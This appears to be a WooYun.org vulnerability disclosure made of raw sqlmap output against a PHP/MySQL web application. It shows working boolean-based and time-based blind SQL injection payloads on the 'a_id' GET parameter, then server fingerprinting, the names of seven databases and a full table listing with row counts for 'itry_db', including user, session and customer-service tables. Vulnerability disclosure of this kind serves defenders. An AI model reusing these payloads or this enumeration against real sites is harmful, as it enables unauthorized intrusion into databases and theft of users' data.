WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: a_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: func=appraise&action=detail&a_id=19 AND 8422=8422
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: func=appraise&action=detail&a_id=19 AND (SELECT * FROM (SELECT(SLEEP(5)))jNqk)
---
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.3.3, Apache 2.2.3
back-end DBMS: MySQL 5.0.12
current database:    'itry_db'
current user is DBA:    False
available databases [7]:
[*] dev_itry_db
[*] dev_itry_phpbb
[*] dev_iwantgroup
[*] information_schema
[*] itry
[*] itry_db
[*] test

Database: itry_db
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| schedule_batch_fire_count     | 1410935 |
| schedule_mark                 | 1201028 |
| survey_answer                 | 548487  |
| schedule_winner               | 333893  |
| epaper                        | 125233  |
| products_spec_item            | 32236   |
| survey_process_log            | 32212   |
| survey_process                | 29252   |
| schedule_blacklist            | 24086   |
| questionnaire_answer          | 23519   |
| schedule_report               | 19441   |
| customer_service_sub          | 12928   |
| question_skin_type            | 12713   |
| customer_service_main         | 11358   |
| schedule_winner_report_plain  | 5123    |
| forward_mem                   | 3809    |
| schedule_winner_report        | 3721    |
| schedule_batch                | 3644    |
| consuming                     | 3238    |
| fbattend                      | 3086    |
| schedule_products_join        | 2499    |
| schedule_participate_list     | 2417    |
| schedule                      | 2334    |
| schedule_products             | 2333    |
| appraise_answer               | 1937    |
| products                      | 1889    |
| products_spec                 | 1889    |
| announce_member               | 1876    |
| products_brand                | 1854    |
| schedule_batch_fire_filter    | 1686    |
| announce                      | 1661    |
| products_detail_item          | 1587    |
| announce_member_status        | 1253    |
| questionnaire_item            | 926     |
| family                        | 897     |
| schedule_shock_get            | 779     |
| sessions                      | 743     |
| appraise_products_spec        | 687     |
| factory_contact               | 613     |
| drawing_distribution          | 576     |
| brand                         | 487     |
| brand_factory                 | 439     |
| factory                       | 413     |
| products_class                | 366     |
| criticize_class               | 363     |
| contact                       | 354     |
| survey_image_text             | 296     |
| schedule_products_spec        | 237     |
| schedule_register_filter      | 215     |
| forward                       | 196     |
| questionnaire_topic           | 182     |
| schedule_winner_report_date   | 167     |
| products_select_item          | 99      |
| counter                       | 92      |
| family_history                | 84      |
| holiday                       | 81      |
| schedule_shock                | 62      |
| products_detail               | 36      |
| forum_article_1               | 35      |
| account_marker                | 28      |
| schedule_drawing_filter       | 28      |
| consuming_ref_url             | 27      |
| schedule_project              | 24      |
| appraise                      | 22      |
| appraise_share                | 19      |
| route_entity_item             | 18      |
| contact_products              | 16      |
| questionnaire                 | 15      |
| question_class                | 14      |
| `user`                        | 13      |
| appraise_class                | 13      |
| brand_class                   | 13      |
| drawing_distribution_item     | 13      |
| example_content               | 13      |
| fbactive                      | 13      |
| postage_outside               | 13      |
| schedule_class                | 13      |
| tryout_commodity              | 12      |
| writing_quality               | 11      |
| customer_service_class        | 10      |
| customer_service_question     | 10      |
| identitys                     | 8       |
| pointbook_class               | 8       |
| products_select               | 8       |
| project                       | 7       |
| user_group                    | 7       |
| consuming_class               | 6       |
| schedule_register_filter_list | 6       |
| products_route_entity         | 5       |
| route_entity                  | 5       |
| route_network                 | 4       |
| user_log                      | 4       |
| event_trigger                 | 3       |
| helper_user                   | 3       |
| pointbook_from_2011           | 3       |
| project_products              | 3       |
| event_receiver                | 2       |
| sign_class                    | 2       |
| forum_cron                    | 1       |
| forum_name                    | 1       |
| forum_site                    | 1       |
| helper_user_group             | 1       |
| pointbook_amount              | 1       |
| pointbook_company_class       | 1       |
| products_route_network        | 1       |
| sign                          | 1       |
+-------------------------------+---------+